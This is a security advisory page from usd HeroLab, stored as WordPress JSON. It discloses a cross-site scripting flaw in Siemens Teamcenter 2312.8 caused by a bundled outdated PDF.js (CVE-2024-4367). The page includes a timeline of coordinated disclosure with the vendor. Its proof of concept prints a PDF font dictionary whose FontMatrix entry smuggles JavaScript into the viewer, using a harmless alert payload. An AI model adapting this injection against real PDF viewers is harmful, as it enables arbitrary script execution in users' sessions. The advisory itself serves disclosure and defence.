{"id":25276,"date":"2026-07-14T07:46:36","date_gmt":"2026-07-14T05:46:36","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=25276"},"modified":"2026-07-14T07:48:02","modified_gmt":"2026-07-14T05:48:02","slug":"usd-2025-37","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2025-37\/","title":{"rendered":"usd-2025-37"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.27.7\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.27.7\" _module_preset=\"default\" custom_padding=\"||13px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<\/p>\n<h1>usd-2025-37 | Teamcenter 2312.8 - Cross-Site Scripting<\/h1>\n<h1><\/h1>\n<p><strong>Product<\/strong>: Teamcenter<br \/><strong>Affected Version<\/strong>: 2312.8<br \/><strong>Vulnerability Type<\/strong>: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)<br \/><strong>Security Risk<\/strong>: HIGH<br \/><strong>Vendor<\/strong>: Siemens<br \/><strong>Vendor URL<\/strong>: https:\/\/plm.sw.siemens.com\/de-DE\/teamcenter\/<br \/><strong>Vendor acknowledged vulnerability<\/strong>: Yes<br \/><strong>Vendor Status<\/strong>: <a href=\"https:\/\/cert-portal.siemens.com\/productcert\/html\/ssa-827383.html\" target=\"_blank\" rel=\"noopener\">Fixed<\/a><br \/><strong>CVE Number<\/strong>: <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/cve-2024-4367\" target=\"_blank\" rel=\"noopener\">CVE-2024-4367<\/a><br \/><strong>CVE Link<\/strong>: https:\/\/nvd.nist.gov\/vuln\/detail\/cve-2024-4367<br \/><strong>Advisory ID<\/strong>: usd-2025-37<\/p>\n<h3>Description<\/h3>\n<p>An outdated software version of PDF.js with known vulnerabilities is in use.<\/p>\n<p>The use of software with known security vulnerabilities represents a security risk, as details on how to exploit these vulnerabilities are often published as well.<\/p>\n<p>As a result, the vulnerable software can be compromised with little effort, even by attackers with limited technical capability.<\/p>\n<h3>Proof of Concept<\/h3>\n<p>The PDF.js version used in Siemens Teamcenter is vulnerable to CVE-2024-4367 which leads to arbitrary JavaScript execution.<br \/>To proof this, the following payload is injected into a malicious PDF document:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span>alert(document.domain)<\/pre>\n<\/div>\n<p>In order to make the vulnerability trigger, the payload has to be injected into the <strong>FontMatrix<\/strong> property of the PDF:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"k\" style=\"background: #263238;color: #bb80b3\">[...]<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">&lt;&lt;<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">\/Widths[573 0 582 0 548 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 573 0 573 0 341]<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">\/Type\/Font<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">\/BaseFont\/PAXEKO+SourceSansPro-Bold<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">\/LastChar 102<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">\/Encoding\/WinAnsiEncoding<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">\/FontMatrix [0.1 0 0 0.1 0 (1\\);<\/span>\n<span class=\"hll\" style=\"background: #263238;background-color: #2c3b41\"><span class=\"na\" style=\"background: #263238;color: #bb80b3\">alert\\(document.domain\\)<\/span>\n<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">\/\/)]<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">\/Subtype\/Type1<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">\/FirstChar 65<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">\/FontDescriptor 9 0 R<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">&gt;&gt;<\/span>\n<span class=\"k\" style=\"background: #263238;color: #bb80b3\">[...]<\/span><\/pre>\n<\/div>\n<p>Afterwards, the malicious PDF was uploaded as an attachment in one of the objects:<br \/><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/07\/xss_upload_37.png\" width=\"1208\" height=\"693\" alt=\"\" class=\"wp-image-25232 alignnone size-full\" srcset=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/07\/xss_upload_37.png 1208w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/07\/xss_upload_37-980x562.png 980w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/07\/xss_upload_37-480x275.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 1208px, 100vw\" \/><\/p>\n<p>If the attachment is now displayed in the preview with the PDF.js library, the payload triggers.<br \/><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/07\/xss_triggered_37.png\" width=\"1209\" height=\"686\" alt=\"\" class=\"wp-image-25234 alignnone size-full\" srcset=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/07\/xss_triggered_37.png 1209w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/07\/xss_triggered_37-980x556.png 980w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/07\/xss_triggered_37-480x272.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 1209px, 100vw\" \/><\/p>\n<h3>Fix<\/h3>\n<p>It is recommended to upgrade the vulnerable software PDF.js immediately to the latest stable release.<\/p>\n<h3>References<\/h3>\n<ul>\n<li><a href=\"https:\/\/owasp.org\/www-community\/attacks\/xss\/\" target=\"_blank\" rel=\"noopener\">https:\/\/owasp.org\/www-community\/attacks\/xss\/<\/a><\/li>\n<li><a href=\"https:\/\/cheatsheetseries.owasp.org\/cheatsheets\/Cross_Site_Scripting_Prevention_Cheat_Sheet\" target=\"_blank\" rel=\"noopener\">https:\/\/cheatsheetseries.owasp.org\/cheatsheets\/Cross_Site_Scripting_Prevention_Cheat_Sheet<\/a><\/li>\n<\/ul>\n<h3>Timeline<\/h3>\n<ul>\n<li><strong>2025-07-28<\/strong>: Vulnerabilities initially reported via Siemens' vulnerability handling and disclosure process.<\/li>\n<li><strong>2025-08-20<\/strong>: Siemens report that they could reproduce the findings and are working on a fix.<\/li>\n<li><strong>2026-05-12<\/strong>: Siemens releases a fix and publishes an advisory about the findings, see <a href=\"https:\/\/cert-portal.siemens.com\/productcert\/html\/ssa-827383.html\" target=\"_blank\" rel=\"noopener\">https:\/\/cert-portal.siemens.com\/productcert\/html\/ssa-827383.html<\/a><\/li>\n<li><strong>2026-07-14<\/strong>: This advisory is published.<\/li>\n<\/ul>\n<h3>Credits<\/h3>\n<p>This security vulnerability was identified by Robin Plugge of usd AG.<\/p>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2025-37 | Teamcenter 2312.8 - Cross-Site Scripting Product: TeamcenterAffected Version: 2312.8Vulnerability Type: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)Security Risk: HIGHVendor: SiemensVendor URL: https:\/\/plm.sw.siemens.com\/de-DE\/teamcenter\/Vendor acknowledged vulnerability: YesVendor Status: FixedCVE Number: CVE-2024-4367CVE Link: https:\/\/nvd.nist.gov\/vuln\/detail\/cve-2024-4367Advisory ID: usd-2025-37 Description An outdated software version of PDF.js with known vulnerabilities is in use. The use of [&hellip;]<\/p>\n","protected":false},"author":114,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-25276","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/25276","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/114"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=25276"}],"version-history":[{"count":4,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/25276\/revisions"}],"predecessor-version":[{"id":25283,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/25276\/revisions\/25283"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=25276"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}